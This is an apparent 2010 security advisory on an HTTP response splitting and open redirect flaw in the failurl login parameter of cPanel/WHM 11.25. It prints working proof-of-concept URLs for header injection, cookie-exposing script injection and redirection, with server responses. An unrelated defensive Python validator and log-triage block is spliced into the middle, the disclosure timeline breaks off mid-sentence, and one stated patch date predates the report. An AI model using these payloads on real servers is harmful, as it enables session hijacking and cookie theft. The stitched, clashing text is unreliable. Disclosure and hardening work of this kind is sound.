cPanel HTTP Response Splitting Vulnerability


Recognize-Security - cPanel HTTP Response Splitting Vulnerability

-----------------------------------------------------------------

Security Advisory by Trancer

January 21 2010

http://www.rec-sec.com

"Hacking, however, is an art, not a science."

Vendor

------

cPanel Inc. - http://www.cpanel.net

Vulnerability Information

-------------------------

Application description:

"cPanel is the industry leader for turning standalone servers into a fully automatic point-and-click hosting platform. Tedious tasks are replaced by web interfaces and API-based CLIs. cPanel is designed with multiple levels of administration including admin, reseller, end user, and email-based interfaces. These multiple levels provide security, ease of use, and flexibility for everyone from the server administrator to the email account user." - cPanel website.

Remotely exploitable: Yes

Locally exploitable: No

Affected versions:

- cPanel 11.25 build 42174

- WHM (WebHost Manager) 11.25 build 42174

* Previous versions may also be affected.

Vulnerability Details

---------------------

An input validation problem exists within cPanel and WHM versions 11.25 (up to build 42174) which allows injecting CR (carriage return, %0D or \r) and LF (line feed, %0A or \n) characters into the server HTTP response header, resulting in an HTTP Response Splitting [1] vulnerability.

The vulnerability exists in the failurl parameter of the cPanel login page. After a failed login attempt, the value of failurl is returned to the client in the Location HTTP header.

This vulnerability is possible because the application fails to validate user-supplied input to the failurl parameter, returning it unsanitized within the server HTTP response header back to the client. This vulnerability not only gives attackers control of the remaining headers and body of the server response, but also allows them to create additional responses entirely under their control.

Attacker-supplied HTML or JavaScript code could run in the context of the affected site, potentially allowing an attacker to steal cookie-based authentication credentials, control how the site is rendered to the user, and influence or misrepresent how web content is served, cached, or interpreted. Other attacks are also possible.

cPanel Inc. patched the HTTP Response Splitting vulnerability in the latest versions (build 42213 up to 42483, the latest version) of cPanel and WHM, but an Open Redirection [2] [3] vulnerability still exists (see Disclosure Timeline).

Proof-of-Concept

----------------

Header Injection ("Set-Cookie"):

http://server.com:2082/login/?user=foo&pass=bar&failurl=%0D%0ASet-Cookie%3A%20Rec=Sec

Server Response:

HTTP/1.1 307 Moved
Server: cpsrvd/11.25
Connection: close
Content-length: 105
Location:
Set-Cookie: Rec=Sec
Content-type: text/html

<html>

Cross-Site Scripting:

http://server.com:2082/login/?user=foo&pass=bar&failurl=%0D%0AContent-Type:%20text/html%0D%0A%0D%0A%3Cscript%3Ealert%28%22Recognize-Security%20-%20%22%2Bdocument.cookie%29;%3C/script%3E%3C!--

Server Response:

HTTP/1.1 307 Moved
Server: cpsrvd/11.25
Connection: close
Content-length: 206
Location:
Content-Type: text/html

<script>alert("Recognize-Security - " + document.cookie);</script><!--
Content-type: text/html

<html>

Open Redirection:

http://server.com:2082/login/?user=foo&pass=bar&failurl=http://www.rec-sec.com

Server Response:

HTTP/1.1 307 Moved
Server: cpsrvd/11.25
Connection: close
Content-length: 106
Location: http://www.rec-sec.com
Content-type: text/html

<html>
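The following Python is added here as an illustration and is not cPanel/WHM code. It shows the server-side check that closes both findings from the Vulnerability Details and Proof-of-Concept sections: the failurl value is percent-decoded once, rejected if it carries CR/LF (response splitting) or points to another host or scheme (open redirection), and only then placed in a Location header. The same classifier is then run over a few constructed access-log lines to show how the three proof-of-concept requests stand out during log review. The hostname server.com, the /login/ fallback path and the log lines are assumptions, not values from the advisory.

```python
"""Redirect-target validation and log triage for a failurl-style parameter.

Added example (not cPanel/WHM code). Assumption: the login handler echoes
the query parameter `failurl` into a Location header after a failed login,
as the advisory describes. `server.com`, the fallback path and the sample
log lines are constructed for this example.
"""
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Any of these inside a header value terminates or splits the header line.
CONTROL_CHARS = ("\r", "\n", "\0")


def classify_redirect(value, allowed_host):
    """Return None when `value` (already percent-decoded) is a safe redirect
    target for `allowed_host`, otherwise a short reason string."""
    if any(ch in value for ch in CONTROL_CHARS):
        return "crlf"                 # %0D / %0A -> header injection
    if value.startswith(("//", "\\", "/\\")):
        return "offsite"              # protocol-relative / backslash tricks
    parts = urlsplit(value)
    if parts.scheme or parts.netloc:
        if parts.scheme not in ("http", "https"):
            return "unsafe-scheme"    # javascript:, data:, ...
        if parts.hostname != allowed_host:
            return "offsite"          # open redirection to a foreign host
        return None
    if not value.startswith("/"):
        return "not-rooted"           # "evil.com/x" is a relative path
    return None


def build_location_header(raw_failurl, allowed_host, fallback="/login/"):
    """Hardened replacement for echoing failurl: decode exactly once,
    validate, and fall back to a fixed same-site path on any rejection."""
    value = unquote_plus(raw_failurl)
    if classify_redirect(value, allowed_host) is not None:
        value = fallback
    return "Location: " + value


# Constructed access-log lines (combined format, request line kept raw).
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - [21/Jan/2010:10:00:01 +0000] "GET /login/?user=foo&pass=bar'
    '&failurl=/frontend/x3/index.html HTTP/1.1" 307 105',
    '10.0.0.9 - - [21/Jan/2010:10:00:02 +0000] "GET /login/?user=foo&pass=bar'
    '&failurl=%0D%0ASet-Cookie%3A%20Rec=Sec HTTP/1.1" 307 105',
    '10.0.0.9 - - [21/Jan/2010:10:00:03 +0000] "GET /login/?user=foo&pass=bar'
    '&failurl=%0D%0AContent-Type:%20text/html%0D%0A%0D%0A%3Cscript%3Ealert'
    '%28%22Recognize-Security%20-%20%22%2Bdocument.cookie%29;%3C/script%3E'
    '%3C!-- HTTP/1.1" 307 206',
    '10.0.0.9 - - [21/Jan/2010:10:00:04 +0000] "GET /login/?user=foo&pass=bar'
    '&failurl=http://www.rec-sec.com HTTP/1.1" 307 106',
]

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')


def triage_log(lines, allowed_host):
    """Return (line_no, reason) for every request whose failurl value the
    hardened handler would reject; benign same-site redirects are skipped."""
    findings = []
    for n, line in enumerate(lines, 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        query = urlsplit(m.group(1)).query
        # parse_qs percent-decodes, so %0D%0A becomes a real CR/LF here.
        for value in parse_qs(query, keep_blank_values=True).get("failurl", []):
            reason = classify_redirect(value, allowed_host)
            if reason:
                findings.append((n, reason))
    return findings


if __name__ == "__main__":
    for raw in ("/frontend/x3/index.html",
                "%0D%0ASet-Cookie%3A%20Rec=Sec",
                "http://www.rec-sec.com"):
        print(repr(raw), "->", build_location_header(raw, "server.com"))
    for line_no, reason in triage_log(SAMPLE_LOG_LINES, "server.com"):
        print("log line %d: %s" % (line_no, reason))
```

The control-character check runs before urlsplit on purpose: recent Python versions strip CR and LF while parsing, so validating the parsed result alone would let an injected header through.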

Discovery

---------

Moshe Ben Abu - Trancer

Recognize-Security

mtrancer [AT_nospam] gmail.com

http://www.rec-sec.com

Disclosure Timeline

-------------------

- 16/12/2009 - Recognize-Security notifies the cPanel Security Team about an HTTP Response Splitting vulnerability discovered in cPanel and WHM version 11.25 build 42174, sending a security advisory draft.

- 17/12/2009 - cPanel Security Team confirms the HTTP Response Splitting vulnerability, setting the release date of a patched version to January 1st, 2009.

- 17/12/2009 - Recognize-Security asks for further information regarding the exact version numbers of the vulnerable systems. Got no response.

- 21/12/2009 - cPanel Inc. releases cPanel and WHM version 11.25.0 build 42213, fixing the HTTP Response Splitting vulnerability.

- 22/12/2009 - Recognize-Security requests status regarding the vulnerability from the cPanel Security Team. Got no response.

- 14/01/2010 - Recognize-Security confirms the HTTP Response Splitting vulnerability is patched in the latest cPanel and WHM versions (build 42483) and finds
